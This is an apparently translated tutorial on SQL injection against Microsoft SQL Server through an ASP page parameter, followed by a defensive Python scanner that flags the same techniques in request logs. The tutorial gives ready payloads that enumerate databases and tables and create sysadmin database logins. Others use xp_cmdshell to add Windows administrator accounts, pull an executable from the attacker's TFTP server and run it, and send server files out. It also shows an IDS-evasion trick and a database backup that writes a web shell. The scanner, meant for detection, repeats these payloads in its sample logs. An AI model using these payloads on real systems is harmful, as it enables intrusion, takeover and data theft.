Preface:
This article covers advanced techniques only; basic injection methods are not detailed here.
If you do not understand them, read the basic injection article first.
For better injection results, I suggest reading the SQL grammar articles on this site.
[Get all database names]
select name from master.dbo.sysdatabases where dbid=7 // dbid values of 7 and above are user databases
[Get table names] [Update a field's value to the table name and read it back; repeat with NOT IN to get the next table name]
select top 1 name from <database name>.dbo.sysobjects where xtype='u' and status>0 and name not in ('<known table>')
[Get table field names] [Update a field's value to the field name and read it back; repeat to get the next field name]
select top 1 <database name>.dbo.col_name(object_id('<table name>'), <column number, e.g. 1>) [WHERE condition]
Adding a database administrator account and a system administrator account through SQL Server injection [the current account must be in the sysadmin group]
News.asp?id=2;exec master.dbo.sp_addlogin test,test;-- // adds database login test with password test
News.asp?id=2;exec master.dbo.sp_password test,123456,test;-- // use this if you want to change the password (changes test's password to 123456)
News.asp?id=2;exec master.dbo.sp_addsrvrolemember test,sysadmin;-- // adds test to the sysadmin group; members of this group can perform any operation
News.asp?id=2;exec master.dbo.xp_cmdshell 'net user test test /add';-- // adds system user test with password test
News.asp?id=2;exec master.dbo.xp_cmdshell 'net localgroup administrators test /add';-- // adds system user test to the administrators group
This way you have left a test administrator account in both the database and the operating system.
Here is how to download the file file.exe from your own machine [prerequisite: your computer must run a TFTP server with port 69 open]:
id=2;exec master.dbo.xp_cmdshell 'tftp -i <your IP> get file.exe';--
Then run this file:
id=2;exec master.dbo.xp_cmdshell 'file.exe';--
Download the server's file file2.doc to the local TFTP server [the file must exist]:
id=2;exec master.dbo.xp_cmdshell 'tftp -i <your IP> put file2.doc';--
Bypassing IDS detection [using variables]
declare @a sysname set @a='xp _' 'cmdshell' exec @a 'DIR C: /'
declare @a sysname set @a='xp' '_ cm' 'dshell' exec @a 'DIR C: /'
Newly added:
Create a table with only one field of type image, write the ASP contents into it, then export the database as a file:
backup database DBName to disk='D:/Web/db.asp';
Using error messages to get the operating system and database version number:
id=2 and 1<>(select @@version);--
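As an added defensive example (not part of the original article): a small Python scanner that URL-decodes and normalises request query strings, then flags the MSSQL stacked-query techniques described above, including the "exec a variable" trick that hides the procedure name from naive keyword matching. The log line format and the sample lines are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the MSSQL techniques this article describes. Each regex is
# applied to a normalised query string (URL-decoded twice, lower-cased,
# whitespace collapsed), so encoding and spacing tricks do not hide them.
SIGNATURES = {
    "stacked_exec": r";\s*exec\b",
    "xp_cmdshell": r"xp_cmdshell",
    "login_or_role_change": r"\bsp_(addlogin|password|addsrvrolemember)\b",
    "os_account_change": r"\bnet\s+(user|localgroup)\b",
    "tftp_transfer": r"\btftp\b",
    "backup_to_webroot": r"\bbackup\s+database\b.*\bto\s+disk\b",
    "version_probe": r"@@version",
    "catalog_enum": r"\b(sysdatabases|sysobjects|col_name)\b",
    # procedure name stored in a variable and executed indirectly
    "proc_name_via_variable": r"\bdeclare\s+@\w+\s+sysname\b.*\bexec\s+@\w+",
}

def normalise(query_string: str) -> str:
    s = unquote_plus(query_string)
    s = unquote_plus(s)  # second pass catches double-encoded payloads
    return re.sub(r"\s+", " ", s).lower()

def classify(query_string: str) -> list:
    """Return the names of all signatures that match the query string."""
    text = normalise(query_string)
    return [name for name, pat in SIGNATURES.items() if re.search(pat, text)]

# Constructed sample log lines: "<client ip> <method> <path> <query>".
# These are not real traffic; they mirror the payload shapes in the article.
SAMPLE_LOG = [
    "10.0.0.5 GET /news.asp id=2",
    "10.0.0.5 GET /news.asp id=2;exec+master.dbo.sp_addlogin+test,test;--",
    "10.0.0.5 GET /news.asp id=2;exec+master.dbo.xp_cmdshell+%27net+user+test+test+/add%27;--",
    "10.0.0.5 GET /news.asp id=2;declare+@a+sysname+set+@a=%27xp_cmdshell%27+exec+@a+%27dir+c:\\%27;--",
    "10.0.0.5 GET /news.asp id=2+and+1%3C%3E(select+@@version);--",
]

def scan(lines) -> list:
    """Return (query, matched signature names) for every line that triggers a signature."""
    hits = []
    for line in lines:
        parts = line.split(" ", 3)
        query = parts[3] if len(parts) == 4 else ""
        found = classify(query)
        if found:
            hits.append((query, found))
    return hits

if __name__ == "__main__":
    for query, found in scan(SAMPLE_LOG):
        print(f"{query!r}: {', '.join(found)}")
```

Note that the variable-indirection line does not trigger "stacked_exec" (the statement after ";" is "declare", not "exec"), which is why the "proc_name_via_variable" signature is needed alongside plain keyword checks.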